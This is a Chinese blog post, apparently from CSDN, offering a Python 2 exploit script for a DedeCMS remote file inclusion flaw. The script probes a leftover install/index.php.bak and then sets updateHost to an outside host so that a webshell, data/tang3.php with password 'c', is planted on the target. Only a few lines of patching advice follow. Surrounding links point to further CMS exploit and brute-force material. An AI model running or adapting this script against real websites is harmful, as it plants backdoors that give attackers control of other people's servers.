python如何执行代码漏洞_织梦dedecms最新远程代码执行利用脚本(python)

最新推荐文章于 2022-10-06 17:32:58 发布
最新推荐文章于 2022-10-06 17:32:58 发布
阅读量225 收藏
点赞数
文章标签: python如何执行代码漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39638304/article/details/111433135
版权
这篇博客介绍了如何利用Python编写脚本来检测和利用织梦CMS的远程代码执行漏洞。提供了漏洞利用和修复建议,包括删除或改名install文件夹,更改data文件夹的位置,升级织梦版本以及应用官方补丁。
摘要由CSDN通过智能技术生成

织梦CMS漏洞,就好比女人的大姨妈,每个月不来上一次,这就算是内分泌失调。代码是用python写的,小伙伴们自行调试吧!在前段时间,织梦爆出了一个远程文件包含漏洞。呃,感谢hoseph同学提供的代码吧。写的很不错!修复此漏洞方法,请见文章底部。

#! /usr/bin/env python

#coding=utf-8

#Joseph(小续)

import requests

import sys

import re

def main():

try:

url="http://"+sys.argv[1].strip('http://')

except IndexError:

print '''

poc: dede.py [url]http://www.baidu.com/[/url]

'''

payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"

urlpoc=url+payload

code=requests.get(urlpoc).status_code

if code==200:

print u"恭喜存在此漏洞"

print u"Ongoing attacks--->>>>>"

exploit(url)

pass

else:

print u"sorry 漏洞正在挣扎"

pass

def exploit(url):

urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"

htmlcontent=requests.get(urlpoc).content

Probe=re.compile(r'存在')

if Probe.findall(htmlcontent):

print u'''

ver:getshell成功

shell:url+/data/tang3.php?a=0  密码为:c

'''

pass

else:

print u"请看远程地址是否已经不可用"

pass

if __name__ == '__main__':

main()

修复方法:

1、建议安装完成后,删除(改名)install文件夹。

2、给data文件夹改名,或者移动位置。

3、到织梦后台,升级到最新的版本

4、官方网站下载最新补丁包手动更新到最新版本。

5、不用谢!

weixin_39638304
关注
魔兽世界python脚本拍卖行_Python大法之告别脚本小子系列—信息资产收集类脚本编写(上)...
weixin_39561431的博客
11-30 1371
0×01 前言在采集到URL之后,要做的就是对目标进行信息资产收集了,收集的越好,你挖到洞也就越多了…………当然这一切的前提,就是要有耐心了!!!由于要写工具较多,SO,我会分两部分写……0×02 端口扫描脚本编写端口扫描的原理:端口扫描,顾名思义,就是逐个对一段端口或指定的端口进行扫描。通过扫描结果可以知道一台计算机上都提供了哪些服务,然后就可以通过所提供的这些服务的己知漏洞就可进行攻击。其原理...
python代码执行漏洞_Vulnhub-uWSGI 远程代码执行漏洞
weixin_31304817的博客
12-28 340
郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。漏洞简述uWSGI是一个经常被使用的应用容器,通常情况下由于WSGI是Python实现的标准,所以uWSGI经常作为Python应用容器启动。但实际上uWSGI同样也支持加载Perl/Ruby/Go等应用。uWSGI程序中默认注册了一系列schemes,其中很多都是危险协议,尤其注意到其中有exec协议,可以直接通过刚才的...
Dedecms 中的预认证远程代码执行
xuu4561的博客
10-05 304
在这篇博文中,我将分享对 Dedecms(或翻译成英文的“Chasing a Dream”CMS)的技术评论,包括它的攻击面以及它与其他应用程序的不同之处。最后,我将结束一个影响v5.8.1 预发布的预认证远程代码执行漏洞。这是一款有趣的软件,因为它自最初发布以来已有 14 年的历史,而且 PHP 多年来发生了很大变化。 对于网上搜索“什么是中国最大的CMS”很快发现,多 源 的状态是DEDECMS是最流行的。然而,这些来源几乎都有一个共同点:它们都是旧的。 所以,我决定做一个粗略的搜索: 该产品部署非常
python supervisord 远程命令执行漏洞(CVE-2017-11610)
whatday的专栏
06-27 768
Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。 我觉得它相比Systemd有几个特点: 配置比较简单 一个简单的第三方应用,与系统没有耦合 提供HTTP API,支持远程操作 所以,我之前把他用来跑一些Web应用。 Supervisord的架构分为Server和Client,Server以一个服务的形式,跑在系统后台,而Client是一个命令行工具,其实就是根据用户的要求,调用Server提供的A
python代码执行漏洞_Python 被爆大 Bug,攻击者可远程代码执行漏洞
weixin_39699746的博客
03-02 239
近日,Python 软件基金会(PSF)释出 Python3.8.8和3.9.2版本,该版本主要修复了两个值得注意的安全漏洞,其中一个名为“CVE-2021-3177”的漏洞容易被攻击者远程利用,基于代码执行可让计算机脱机。乍一看,让计算机脱机并不是什么大事,不过,倘若真的被有心之人利用漏洞,那么,使用 Python 的用户难免会有一段糟心的体验。对此,在 Python3.8.8和或...
Python 紧急修复远程代码执行漏洞
smellycat000的专栏
02-23 542
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队Python 软件基金会 (PSF) 紧急推出 Python 3.9.2 和 3.8.8 稳定版,解决两个严重的安全缺陷,其中...
[CMS程序]DedeCms 5.3 UTF-8英文版_dedecmsv51sp1-utf8-92rmb.zip
最新发布
03-16
【CMS程序】DedeCms 5.3 UTF-8英文版_dedecmsv51sp1-utf8-92rmb.zip是一个压缩包,包含DedeCms织梦内容管理系统)5.3版本的英文版。DedeCms是一款广泛应用于网站构建的开源内容管理框架,特别适合于非技术背景的...
python怎么跑数据_python定时重跑获取数据
weixin_42421187的博客
01-13 1696
做大数据的童鞋经常会写定时任务跑数据,由于任务之间的依赖(一般都是下游依赖上游的数据产出),所以经常会导致数据获取失败,因为很多人发现数据失败后都会去查看日志,然后手动去执行自己的任务。下面我实现了一个自动重复执行去数据库取数,如果失败后自动重新去获取,直到把数据获取到。建数据表:CREATE TABLE `testtable` (`id` int(11) unsigned NOT NULL AU...
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
CMS系列远程代码执行—Discuz
WEB渗透测试 从入门到萌新
10-06 1226
测试漏洞,随便点击一个页面,抓包,将Cookie中的xxx_language参数值改为’.phpinfo().’,发现成功执行代码 存在命令执行漏洞
DeDecms远程写入漏洞webshell (dedecms漏洞)
aomiano55778的博客
02-19 2747
解释下Apache解析文件的流程: 当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。 那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也...
dedecms漏洞
https://www.cnblogs.com/zpchcbd/
05-10 2807
5.7 sp1 爆数据库 /plus/search.php?keyword=xxx&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=102&arrs1[]=95&arrs1[]=115&arrs1[]=116&arrs1[]=121&a...
dedecms 漏洞_dedescan一款织梦漏洞扫描
weixin_39661780的博客
11-29 1818
dedescan是一款可以扫描所有已公开的dedecms漏洞扫描器。 ... ... ... ... ...
python学习之dedecms exp编写
cxk
05-24 737
python学习之dedecms exp编写 针对织梦5.7 sp1远程文件包含getshell exp编写,漏洞分析请查看网上分析,不再赘述。 exp # -*- coding:utf-8 -*- import requests import time def dada(url): url_index=url+"/install/index.php" headers = {"...
python | 批量判断是否是织梦dedecms程序
weixin_45373278的博客
11-11 680
import requests import os import sys import lxml import _thread import time import re import json f = open('C:\\Users\\评论网站.txt', 'r', encoding='utf-8') lines = f.readlines() # 读取全部内容 ,并以列表方式返回 for line in lines: line = line.strip() line = line.l
python更新织梦网站_织梦dedecms系统自动更新文章,免手动更新网站
weixin_39611754的博客
12-20 214
织梦dedecms系统有着能够自动调用文章的功能,只需要使用对应的标签即可,但是该标签不能实时刷新,每次更新都需要我们生成页面才可以,如今技术如此发达,而我们却依然不解决的话,那才是令人惋惜。没错,就像标题写的那样,自动更新文章。cms系统织梦dedecms系统自动更新文章方法1.先看一段代码,这个可是必要的东西{dede:arclist sort='rand' titlelen=48 row=...
python密码爆破脚本_python脚本爆破登录密码
weixin_39603622的博客
12-10 733
说明,纯属练手,不许做坏事,出事后果自负。这个月忙的不行,所有的事情堆在一起了。毕业设计论文、答辩、创新项目结题、实验室项目……在这个月的最后一天还是写一点东西纪念下这个忙碌的五月吧。有那么半个月一直在思考人为什么要活着以及人应该怎么样活着的问题,整个人状态都有点抽风。废话不多说,心态问题只能靠自己慢慢走出来了,进入正题。昨天看了下天哥的一篇日志,关于模拟登录的。于是一时手痒开始做起了一件一直想做...
Dedecms的另类渗透
qq_40162181的博客
07-17 517
Dedecms的另类渗透前言背景第一步:网站信息收集 前言 这个案子完成已有一段时间,早该总结的,先自我批评一下。之所以说是“另类渗透”,严格来说这次渗透是没有成功的,服务器的权限没有拿到,但是拿到了想要的数据。 背景 要获取一个Dedecms 网站的数据,网站后台:未知,账号、密码未知。 第一步:网站信息收集 这位大神这篇帖子讲渗透讲得很好,附上链接:https://blog.csdn.net/qq_36119192/article/details/84674109 对一个cms(内容分发网站),首先要判
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值